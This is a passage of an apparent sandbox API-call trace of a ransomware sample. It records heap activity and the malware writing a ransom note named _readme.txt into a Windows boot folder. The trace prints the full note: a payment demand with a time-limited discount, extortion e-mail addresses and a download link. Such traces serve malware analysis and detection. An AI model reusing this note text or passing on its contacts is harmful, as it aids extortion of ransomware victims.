returned 0x9c5da58 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.234] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0056.234] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.234] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.234] PathFindFileNameW (pszPath="") returned="" [0056.234] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.235] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.235] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.235] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.235] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0056.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.235] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0056.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.235] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.235] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.235] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.236] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.236] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.237] CloseHandle (hObject=0x5c8) returned 1 [0056.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.237] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.238] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.238] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 